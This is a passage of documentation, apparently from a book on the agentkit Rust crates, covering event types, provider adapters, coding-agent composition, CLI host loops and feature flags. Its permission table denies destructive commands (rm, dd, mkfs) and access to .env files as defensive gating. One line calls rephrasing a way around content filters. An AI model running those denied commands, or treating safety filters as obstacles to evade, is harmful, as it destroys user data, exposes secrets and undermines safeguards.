AgentEvent categories

CategoryEvents
LifecycleRunStarted, TurnStarted, TurnFinished, RunFailed
InputInputAccepted
StreamingContentDelta
ToolsToolCallRequested
ApprovalApprovalRequired, ApprovalResolved
AuthAuthRequired, AuthResolved
CompactionCompactionStarted, CompactionFinished
UsageUsageUpdated
DiagnosticWarning

Event timeline for a typical turn

RunStarted { session_id }
│
├── InputAccepted { items: [User("Fix the bug")] }
├── TurnStarted { session_id, turn_id: "turn-1" }
│   ├── ContentDelta(BeginPart { kind: Text })
│   ├── ContentDelta(AppendText { chunk: "I'll " })
│   ├── ContentDelta(AppendText { chunk: "read the file." })
│   ├── ContentDelta(CommitPart { part: Text("I'll read the file.") })
│   ├── ToolCallRequested(ToolCallPart { name: "fs.read_file", ... })
│   └── UsageUpdated(Usage { input: 1500, output: 200 })
│
├── TurnStarted { session_id, turn_id: "turn-2" }  ← automatic tool roundtrip
│   ├── ContentDelta(...)                            ← model response after reading file
│   ├── ToolCallRequested(ToolCallPart { name: "fs.replace_in_file", ... })
│   └── UsageUpdated(Usage { ... })
│
└── TurnFinished(TurnResult { finish_reason: Completed, ... })

Example: openrouter-agent-cli uses a composite reporter with stdout and usage reporting.

Crate: agentkit-reporting — depends on agentkit-loop for event types.

Provider adapters

Chapter 1 built an adapter from scratch for a hypothetical non-standard API, then introduced the CompletionsAdapter for OpenAI-compatible providers. This chapter goes deeper on the CompletionsProvider pattern that most real providers use.

Two paths to an adapter

Path 1: Implement ModelAdapter/ModelSession/ModelTurn directly
  └── For non-standard APIs (custom REST, gRPC, WebSocket)
  └── Full control, full responsibility
  └── ~200-500 lines of translation code

Path 2: Implement CompletionsProvider (via agentkit-adapter-completions)
  └── For OpenAI-compatible chat completions APIs
  └── ~50-100 lines: config + hooks
  └── Transcript conversion, tool serialization, streaming, error handling — all handled

Most providers speak the OpenAI chat completions format (or close variants). For these, CompletionsProvider is the right choice. It handles the ~1000 lines of translation that every completions-compatible adapter needs.

The CompletionsProvider trait

#![allow(unused)]
fn main() {
pub trait CompletionsProvider: Send + Sync + Clone {
    type Config: Serialize + Clone + Send + Sync;

    fn provider_name(&self) -> &str;
    fn endpoint_url(&self) -> &str;
    fn config(&self) -> &Self::Config;

    // Hooks — defaults pass through unchanged:
    fn preprocess_request(&self, builder: RequestBuilder) -> RequestBuilder { builder }
    fn apply_prompt_cache(&self, body: &mut Map<String, Value>, request: &TurnRequest) -> Result<(), LoopError> { Ok(()) }
    fn preprocess_response(&self, _status: StatusCode, _body: &str) -> Result<(), LoopError> { Ok(()) }
    fn postprocess_response(&self, _usage: &mut Option<Usage>, _metadata: &mut MetadataMap, _raw: &Value) {}
}
}

The trait has three required methods (name, URL, config) and four optional hooks. Here’s what each hook is for:

Request lifecycle with hooks:

  TurnRequest
       │
       ▼
  Build JSON body (transcript → messages, tools → tools array)
  Merge Config fields into body
       │
       ├── preprocess_request(builder) ← add auth headers, custom headers
       │
       ├── apply_prompt_cache(body, request) ← map normalized cache requests
       │
       ▼
  HTTP POST to endpoint_url()
       │
       ▼
  Read response
       │
       ├── preprocess_response(status, body) ← check for API errors in 200 responses
       │
       ▼
  Parse into ModelTurnEvents
       │
       ├── postprocess_response(usage, metadata, raw) ← extract provider-specific fields
       │
       ▼
  Return events to loop

What CompletionsAdapter handles

The generic CompletionsAdapter<P> handles all the common work:

ConcernImplementation
Vec<Item>messages[]Maps all ItemKind and Part variants
Vec<ToolSpec>tools[]Converts name, description, JSON Schema
Multimodal content encodingImages as image_url, audio as input_audio
P::Config → request bodySerialize and merge fields
SSE stream parsingChunk reassembly, delta emission
Tool call accumulationCollect streaming JSON fragments into complete calls
finish_reasonFinishReasonMap provider strings to enum variants
usageUsageMap token counts and cost
CancellationRace HTTP future against TurnCancellation
Error status codesConvert 4xx/5xx into LoopError

The Config associated type

The Config type is where providers differ most. Each provider has different parameter names and supported options:

Providermax_tokens fieldExtra fields
OpenAImax_completion_tokensfrequency_penalty, presence_penalty
Ollamanum_predicttop_k
Mistralmax_tokens
Groqmax_completion_tokens
vLLMmax_tokens

By making Config an associated type with Serialize, each provider declares exactly the fields it supports with their correct names. The adapter serializes the struct and merges it into the request body — no field name mapping needed.

Building a provider: the pattern

Every provider crate follows the same structure:

agentkit-provider-{name}/
  src/lib.rs
    ├── {Name}Config         // User-facing config (new, with_temperature, from_env, etc.)
    ├── {Name}RequestConfig  // Serializable request fields (#[serde(skip_serializing_if)])
    ├── {Name}Provider       // CompletionsProvider impl
    └── {Name}Adapter        // Newtype over CompletionsAdapter<{Name}Provider>
                             // Implements ModelAdapter by delegation

The user-facing API:

#![allow(unused)]
fn main() {
let adapter = OllamaAdapter::new(
    OllamaConfig::new("llama3.1:8b")
        .with_temperature(0.0)
        .with_num_predict(4096),
)?;

let agent = Agent::builder()
    .model(adapter)
    .build()?;
}

Available providers

agentkit ships six provider crates:

CrateAuthHooks used
agentkit-provider-openrouterBearer + headersauth, cache mapping, error check, cost
agentkit-provider-openaiBearerauth, cache mapping
agentkit-provider-ollamanoneNone
agentkit-provider-vllmoptional Bearerpreprocess_request (optional auth)
agentkit-provider-groqBearerpreprocess_request (auth)
agentkit-provider-mistralBearerpreprocess_request (auth)

Ollama is the simplest — no auth, no hooks. OpenRouter is the most complex — it uses auth headers, prompt-cache mapping, 200-with-error handling, and response enrichment.

When to implement ModelAdapter directly

Use the raw traits when:

  • The provider doesn’t speak the OpenAI chat completions format
  • The provider uses WebSocket or gRPC instead of HTTP
  • The provider has server-side session state
  • You need streaming behavior that SSE doesn’t support

For WebSocket-based providers:

  • start_session opens the connection
  • begin_turn sends a continuation frame (not the full transcript)
  • next_event reads from the live connection
  • Session cleanup on drop

Testing adapters

Whether you use CompletionsProvider or implement the raw traits, the normalization contract is the same. Test these guarantees:

  1. Text completion → correct Delta sequence ending with CommitPart and Finished
  2. Tool calls → ToolCallPart with valid IDs and parseable JSON input
  3. Multiple tool calls → one ToolCall event per call
  4. Token limit → FinishReason::MaxTokens
  5. Cancellation → clean LoopError::Cancelled
  6. Usage → non-zero, plausible token counts

For CompletionsProvider implementations, you mostly need to test the hooks — the generic adapter handles everything else. Mock the HTTP layer with a test server that returns known SSE responses.

Crate: agentkit-adapter-completions — the generic adapter. agentkit-provider-* — provider-specific implementations.

Architecture of a coding agent

This chapter steps back from individual crates and looks at how they compose into a complete coding agent — the kind of tool you use when you use Claude Code or Codex CLI.

The previous chapters covered each crate in isolation. This chapter shows how they fit together. The goal is not to document every API — that’s what the earlier chapters did. The goal is to show the composition pattern and the trade-offs involved.

What a coding agent needs

A production coding agent requires all of the pieces we’ve covered:

Concernagentkit crate
Transcript and data modelagentkit-core
Capability abstractionagentkit-capabilities
Agent loop and driveragentkit-loop
Tool registry and executionagentkit-tools-core
File read/write/editagentkit-tool-fs
Shell command executionagentkit-tool-shell
Project context loadingagentkit-context
Transcript managementagentkit-compaction
Async task schedulingagentkit-task-manager
Event reportingagentkit-reporting
LLM provider adapteragentkit-provider-openrouter

Plus host-specific concerns:

  • CLI argument parsing and input handling
  • Terminal rendering and streaming output
  • Permission policy configuration
  • Error recovery and retry strategy
  • Session management

The composition pattern

#![allow(unused)]
fn main() {
// 1. Configure tools
let tools = agentkit_tool_fs::registry()
    .merge(agentkit_tool_shell::registry());

// 2. Configure permissions
let permissions = CompositePermissionChecker::new(PermissionDecision::Deny(default_denial()))
    .with_policy(PathPolicy::new().allow_root(workspace_root))
    .with_policy(CommandPolicy::new().require_approval_for_unknown(true));

// 3. Configure compaction
let compaction = CompactionConfig::new(
    ItemCountTrigger::new(20),
    CompactionPipeline::new()
        .with_strategy(DropReasoningStrategy::new())
        .with_strategy(KeepRecentStrategy::new(12)
            .preserve_kind(ItemKind::System)
            .preserve_kind(ItemKind::Context)),
);

// 4. Configure task management
let task_manager = AsyncTaskManager::new().routing(|req: &ToolRequest| {
    if req.tool_name.0 == "shell.exec" {
        RoutingDecision::ForegroundThenDetachAfter(Duration::from_secs(10))
    } else {
        RoutingDecision::Foreground
    }
});

// 5. Configure reporting
let reporter = CompositeReporter::new()
    .with_observer(StdoutReporter::new(std::io::stderr()))
    .with_observer(UsageReporter::new());

// 6. Load context
let context_items = ContextLoader::new()
    .with_source(AgentsMd::discover_all(workspace_root))
    .load()
    .await?;

// 7. Assemble the agent
let agent = Agent::builder()
    .model(OpenRouterAdapter::new(OpenRouterConfig::new(api_key, model))?)
    .tools(tools)
    .permissions(permissions)
    .compaction(compaction)
    .task_manager(task_manager)
    .observer(reporter)
    .build()?;
}

The host loop

The host application drives the interaction:

#![allow(unused)]
fn main() {
let mut driver = agent.start(session_config).await?;

// Submit system prompt and context
driver.submit_input(system_items)?;
driver.submit_input(context_items)?;

loop {
    // Get user input
    let user_input = read_line()?;
    driver.submit_input(vec![user_item(user_input)])?;

    // Run the agent turn
    loop {
        match driver.next().await? {
            LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(req)) => {
                let decision = prompt_user_approval(&req)?;
                driver.resolve_approval(decision)?;
            }
            LoopStep::Interrupt(LoopInterrupt::AuthRequest(req)) => {
                let resolution = handle_auth(&req)?;
                driver.resolve_auth(resolution)?;
            }
            LoopStep::Interrupt(LoopInterrupt::AwaitingInput(_)) => break,
            LoopStep::Finished(result) => {
                print_usage(&result);
                break;
            }
        }
    }
}
}

Crate dependency graph

agentkit-core                    (no dependencies)
     │
     ├── agentkit-capabilities
     │        │
     │        ├── agentkit-tools-core
     │        │        │
     │        │        ├── agentkit-tool-fs
     │        │        ├── agentkit-tool-shell
     │        │        └── agentkit-tool-skills
     │        │
     │        └── agentkit-mcp
     │
     ├── agentkit-compaction
     │
     ├── agentkit-context
     │
     ├── agentkit-task-manager
     │
     ├── agentkit-reporting
     │
     ├── agentkit-adapter-completions
     │        │
     │        ├── agentkit-provider-openrouter
     │        ├── agentkit-provider-openai
     │        ├── agentkit-provider-ollama
     │        ├── agentkit-provider-vllm
     │        ├── agentkit-provider-groq
     │        └── agentkit-provider-mistral
     │
     └── agentkit-loop          (coordinates everything)
              │
              └── agentkit      (re-exports for convenience)

Every crate depends on agentkit-core. The loop crate depends on tools, compaction, and task management. Provider crates depend on the completions adapter. Everything else is a leaf.

Design trade-offs

Sequential vs parallel tool execution

The default SimpleTaskManager is sequential. For a coding agent, this is often fine — file operations are fast and order matters. Shell commands are the exception: builds and tests can take seconds or minutes. ForegroundThenDetachAfter gives you the best of both worlds.

Tool typeRecommended routingWhy
Filesystem toolsForegroundFast, order-sensitive
Shell toolsForegroundThenDetachAfter(5-10s)May be fast or slow
MCP toolsForegroundUsually fast

Compaction strategy

Aggressive compaction loses context. Conservative compaction hits the context window. The right balance depends on the model’s context size and the nature of the work.

Recommended starting point:

  Trigger: 20 items
  Pipeline:
    1. DropReasoningStrategy         (reasoning blocks are verbose, rarely needed later)
    2. DropFailedToolResultsStrategy (failed tool results add noise)
    3. KeepRecentStrategy(12)        (keep last 12 non-preserved items)
       .preserve_kind(System)        (system prompt is always needed)
       .preserve_kind(Context)       (project context is always needed)

For coding agents, keeping recent tool interactions is usually more valuable than keeping old conversation text — the model needs to know what it just read and edited, not what the user said 20 turns ago.

Permission posture

Default-deny is safest but requires more approval prompts. Default-allow with denylists is more fluid but riskier. Most coding agents land in the middle:

Recommended permission posture:

ScopeDecision
Filesystem readsAllow within workspace
Filesystem writesAllow within workspace (with read-before-write)
Filesystem outsideRequireApproval
Protected files (.env)Deny
Shell (known safe)Allow (git, cargo, npm, ls, etc.)
Shell (unknown)RequireApproval
Shell (dangerous)Deny (rm, dd, mkfs)
MCP (trusted)Allow
MCP (unknown)RequireApproval
FallbackDeny

What the host owns

agentkit handles the loop, tools, permissions, and streaming. The host application owns everything else:

  • Input/output — how users type messages and see results
  • Session lifecycle — when sessions start, end, and resume
  • Error recovery — what to do when the model fails or rate-limits
  • Configuration — which model, which tools, which policies
  • Persistence — saving transcripts, session state, usage logs

The boundary is intentional: agentkit is a library, not a framework. The host is in control.

Example: openrouter-agent-cli is the closest existing example to a full coding agent — it combines context, tools, shell, MCP, compaction, and reporting.

The interactive CLI

This chapter covers the host-side implementation of an interactive coding agent CLI: input handling, output rendering, approval UX, session lifecycle, and error recovery.

Everything in this chapter is host code — agentkit doesn’t include a CLI. The library provides the loop, and the host provides the user interface. This separation means the same agentkit crates power a terminal CLI, a web server, an IDE plugin, or a headless CI agent.

The host loop skeleton

Before diving into details, here’s the complete structure of an interactive CLI host:

#![allow(unused)]
fn main() {
// Setup
let agent = Agent::builder()
    .model(adapter)
    .tools(tools)
    .permissions(permissions)
    .observer(reporter)
    .compaction(compaction)
    .cancellation(cancellation_handle)
    .build()?;

let mut driver = agent.start(session_config).await?;

// Submit system prompt and context
driver.submit_input(system_items)?;
driver.submit_input(context_items)?;

// Main interaction loop
loop {
    // Read user input
    let input = read_user_input()?;
    if input == "/exit" { break; }

    driver.submit_input(vec![user_item(&input)])?;

    // Drive the turn to completion
    loop {
        match driver.next().await? {
            LoopStep::Finished(_) => break,
            LoopStep::Interrupt(LoopInterrupt::AwaitingInput(_)) => break,
            LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(p)) => {
                handle_approval(p, &mut driver)?;
            }
            LoopStep::Interrupt(LoopInterrupt::AuthRequest(p)) => {
                handle_auth(p, &mut driver)?;
            }
        }
    }
}
}

Every section below fills in a piece of this skeleton.

Input handling

A coding agent CLI needs to handle:

  • Single-line user messages
  • Multi-line input (pasted code, heredocs)
  • Special commands (exit, help, clear)
  • Ctrl-C for turn cancellation (not process exit)

Cancellation wiring

Wire Ctrl-C to the CancellationController, not to process exit:

#![allow(unused)]
fn main() {
let controller = CancellationController::new();
let handle = controller.handle();

ctrlc::set_handler(move || {
    controller.interrupt();
})?;
}

The first Ctrl-C cancels the current turn. The model sees FinishReason::Cancelled and the turn ends cleanly. The second Ctrl-C (if nothing is running) exits the process.

Output rendering

Streaming text

The StdoutReporter renders ContentDelta events as they arrive. For a CLI, this means writing each text chunk to stdout immediately:

#![allow(unused)]
fn main() {
fn handle_event(&mut self, event: AgentEvent) {
    if let AgentEvent::ContentDelta(Delta::AppendText { chunk, .. }) = event {
        print!("{}", chunk);
        std::io::stdout().flush().ok();
    }
}
}

Tool activity

Display tool calls as they happen so the user knows what the agent is doing:

→ fs.read_file(path: "src/main.rs")
→ fs.replace_in_file(path: "src/main.rs", ...)
→ shell.exec(executable: "cargo", argv: ["build"])

Usage reporting

At the end of each turn, display token counts and cost:

tokens: 1,234 in / 567 out | cost: $0.02

Approval UX

When the loop returns an approval interrupt, present it clearly:

⚠ shell.exec wants to run: rm -rf target/
  Allow? [y/n/always]:

Consider supporting:

  • y — approve once
  • n — deny
  • always — approve and add to allowlist for this session

The approval response maps to ApprovalDecision::Approve or ApprovalDecision::Deny.

Session lifecycle

Multi-turn sessions

A coding agent session typically spans many user turns. The driver persists across turns — the transcript accumulates, compaction fires as needed, and the model retains context from earlier in the conversation.

Graceful shutdown

On exit, flush any buffered reporters, print a final usage summary, and clean up resources. If MCP servers are connected, shut them down cleanly.

Error recovery

Model errors

If the model returns an error (rate limit, content filter, network failure), the driver returns Err(LoopError::...). Display the error and let the user decide:

#![allow(unused)]
fn main() {
match driver.next().await {
    Ok(step) => handle_step(step),
    Err(LoopError::Provider(msg)) => {
        eprintln!("Model error: {msg}");
        eprintln!("Press Enter to retry, or type a new message:");
        // Don't exit — the session is still valid
    }
    Err(LoopError::Cancelled) => {
        eprintln!("Turn cancelled.");
        // Session is still valid, user can send another message
    }
    Err(e) => {
        eprintln!("Fatal error: {e}");
        break;  // Only exit on truly unrecoverable errors
    }
}
}

The key insight: most errors are recoverable. A rate limit resolves after waiting. A content filter can be worked around by rephrasing. A network timeout may succeed on retry. Only exit the session on errors that genuinely corrupt the driver state.

Tool errors

Tool failures are returned to the model as a ToolResultPart with is_error: true. The model sees the error message and can decide to retry, try a different approach, or report the failure. The CLI doesn’t need to handle tool errors specially — they’re part of the normal conversation flow.

Tool error flow (handled entirely within the loop):

  Model: ToolCall(fs.read_file, { path: "main.rs" })
  Tool:  ToolResultPart { is_error: true, output: "File not found" }
  Model: "The file doesn't exist in the current directory. Let me check..."
  Model: ToolCall(shell.exec, { executable: "find", argv: [".", "-name", "main.rs"] })
  Tool:  ToolResultPart { output: "./src/main.rs" }
  Model: ToolCall(fs.read_file, { path: "./src/main.rs" })
  Tool:  ToolResultPart { output: "fn main() { ... }" }

  The host never saw the error — the model handled it autonomously.

Design checklist

A production interactive CLI should handle all of these:

  • Ctrl-C cancels the current turn, not the process
  • Second Ctrl-C (when no turn is running) exits cleanly
  • Streaming text renders as it arrives
  • Tool calls are displayed with name and key arguments
  • Approval prompts clearly show what’s being requested
  • Usage is displayed after each turn
  • Model errors are displayed and the session continues
  • Graceful shutdown flushes reporters and disconnects MCP
  • Multi-line input is supported for pasting code

Example: openrouter-agent-cli implements most of these patterns. The remaining work for a production CLI is polish: better terminal rendering, richer approval UX, and configuration management.

Putting it all together

This final chapter traces the complete path of a user request through the system, from keystroke to completed turn, touching every layer we’ve covered.

This is the payoff chapter. Every type, trait, and design decision from the previous 22 chapters appears here in context. If something below is unfamiliar, the cross-reference tells you where to look.

The scenario

A user types: “Add error handling to the parse function in src/parser.rs”

The agent is configured with filesystem tools, shell tools, a PathPolicy for the workspace, a CommandPolicy with cargo in the allowlist, ForegroundThenDetachAfter(10s) for shell commands, a KeepRecentStrategy compaction pipeline, and a CompositeReporter writing to stdout and a usage tracker.

What happens

1. Input submission

The CLI reads the user’s message and submits it as a User item:

#![allow(unused)]
fn main() {
driver.submit_input(vec![Item {
    kind: ItemKind::User,
    parts: vec![Part::Text(TextPart { text: user_input, .. })],
    ..
}])?;
}

2. Compaction check

The driver checks the compaction trigger. If the transcript exceeds the configured threshold, the compaction pipeline runs — dropping old reasoning blocks, trimming failed tool results, keeping recent items.

3. Turn construction

The driver builds a TurnRequest containing:

  • The working transcript (system prompt, context items, conversation history)
  • Tool specs from the registry (fs.read_file, fs.write_file, fs.replace_in_file, shell.exec, etc.)
  • The normalized prompt cache request for the turn

4. Model invocation

The adapter serializes the request and sends it to the provider. The response streams back as SSE chunks.

5. First tool call — read the file

The model decides it needs to see the file first. It emits a ToolCallPart:

{ "name": "fs.read_file", "input": { "path": "src/parser.rs" } }

The driver:

  1. Looks up fs.read_file in the registry
  2. Evaluates the FileSystemPermissionRequest::Read against the permission checker
  3. The PathPolicy allows reads under the workspace root → Allow
  4. Executes the tool
  5. FileSystemToolResources records that src/parser.rs has been read
  6. Appends the ToolResultPart to the transcript

6. Automatic roundtrip

The driver starts another model turn with the updated transcript. The model now has the file contents.

7. Second tool call — edit the file

The model emits a fs.replace_in_file call with the old and new text.

The driver:

  1. Evaluates FileSystemPermissionRequest::Edit for src/parser.rs
  2. Checks read-before-write policy → the file was read in step 5 → Allow
  3. Executes the replacement
  4. Appends the result

8. Third tool call — verify the change

The model runs shell.exec with cargo check:

The driver:

  1. Evaluates the ShellPermissionRequest
  2. CommandPolicy has cargo in the allowlist → Allow
  3. The task manager routes it as ForegroundThenDetachAfter(10s)
  4. The command finishes in 3 seconds → result returned immediately
  5. Appends the result

9. Final response

The model sees the successful build output and produces a text response explaining what it changed. The StdoutReporter streams each text chunk to the terminal as it arrives.

10. Turn completion

The model finishes with FinishReason::Completed. The driver returns LoopStep::Finished(TurnResult). The CLI displays the usage summary and waits for the next user input.

The dependency graph in action

User input
  │
  ▼
agentkit-core ──────────── Item, Part, Delta, Usage, FinishReason, identifiers
  │
  ▼
agentkit-loop ──────────── LoopDriver, TurnRequest, LoopStep, AgentEvent
  │
  ├── agentkit-compaction ─ CompactionTrigger, CompactionPipeline
  │                         (fires before step 3, trims old items)
  │
  ├── agentkit-provider-* ─ ModelAdapter → ModelSession → ModelTurn
  │                         (step 4, sends transcript, streams response)
  │
  ├── agentkit-tools-core ─ ToolExecutor, PermissionChecker
  │   │                     (step 6, preflight + execute)
  │   │
  │   ├── agentkit-tool-fs ── ReadFileTool, ReplaceInFileTool
  │   │                       (steps 5, 7)
  │   │
  │   └── agentkit-tool-shell ─ ShellExecTool
  │                              (step 8)
  │
  ├── agentkit-task-manager ── AsyncTaskManager, routing
  │                            (step 8, ForegroundThenDetachAfter)
  │
  └── agentkit-reporting ──── StdoutReporter, UsageReporter
                               (every step, event delivery)

Every crate has a clear, narrow responsibility. The loop coordinates. Tools execute. Permissions gate. Reporters observe. The host decides.

Cross-reference

Each step in the walkthrough above maps to a chapter:

StepChapter
1. Input submissionCh 6: Driving the loop
2. Compaction checkCh 16: Transcript compaction
3. Turn constructionCh 5: The model adapter boundary, Ch 15: Prompt caching
4. Model invocationCh 1: Talking to models, Ch 4: Streaming
5. Tool call (read)Ch 11: Filesystem tools
6. Permission checkCh 10: Permissions
7. Tool call (edit)Ch 11: Filesystem tools
8. Tool call (shell)Ch 12: Shell execution, Ch 18: Task management
9. Streaming textCh 4: Streaming and deltas, Ch 19: Reporting
10. Turn completionCh 6: Driving the loop

Where to go from here

This book has covered the full architecture of an agent system. Some areas for further exploration:

  • Custom providers — implement adapters for Anthropic, Google, or local model servers using either CompletionsProvider (~50 lines) or the raw traits (~200-500 lines)
  • Custom tools — database queries, API integrations, code analysis, deployment automation
  • MCP servers — connect to external tool providers for GitHub, databases, Slack, etc.
  • Advanced compaction — semantic summarization with a nested agent backend
  • Multi-agent patterns — tools that spawn sub-agents, parallel agent execution, orchestrator/worker architectures
  • Production hardening — retry strategies, rate limiting, cost controls, audit logging, persistent sessions

The agentkit crate ecosystem is designed to grow at the edges. The core loop and data model are stable foundations. New tools, providers, and integration patterns can be added without changing the architecture.

Stable (change rarely)Grows (add freely)
agentkit-core typesagentkit-provider-* crates
ModelAdapter / ModelSession traitsagentkit-tool-* crates
LoopDriver / LoopStepCompactionStrategy implementations
Tool / ToolSpec / ToolRegistryLoopObserver implementations
PermissionChecker / PermissionPolicyCustom ContextSource implementations
Delta protocolMCP server integrations

Example: The examples/ directory in the agentkit repository contains working implementations that exercise every concept in this book, from the simplest chat loop to a full multi-tool coding agent.

Feature flags

The umbrella crate agentkit re-exports subcrates behind feature flags.

Default flags

  • coreagentkit-core
  • capabilitiesagentkit-capabilities
  • toolsagentkit-tools-core
  • task-manageragentkit-task-manager
  • loopagentkit-loop
  • reportingagentkit-reporting

Optional flags

  • compactionagentkit-compaction
  • contextagentkit-context
  • mcpagentkit-mcp
  • adapter-completionsagentkit-adapter-completions
  • provider-groqagentkit-provider-groq
  • provider-mistralagentkit-provider-mistral
  • provider-ollamaagentkit-provider-ollama
  • provider-openaiagentkit-provider-openai
  • provider-openrouteragentkit-provider-openrouter
  • provider-vllmagentkit-provider-vllm
  • tool-fsagentkit-tool-fs
  • tool-shellagentkit-tool-shell
  • tool-skillsagentkit-tool-skills

Typical combinations

Minimal orchestration:

agentkit = { version = "0.2.2", features = ["core", "capabilities", "tools", "loop"] }

Coding agent:

agentkit = { version = "0.2.2", features = [
    "core", "capabilities", "context", "tools",
    "loop", "tool-fs", "tool-shell", "reporting",
] }

MCP-enabled agent:

agentkit = { version = "0.2.2", features = [
    "core", "capabilities", "context", "tools",
    "loop", "tool-fs", "tool-shell", "reporting", "mcp",
] }

OpenRouter-backed example host:

agentkit = { version = "0.2.2", features = [
    "core", "capabilities", "tools", "loop",
    "reporting", "provider-openrouter",
] }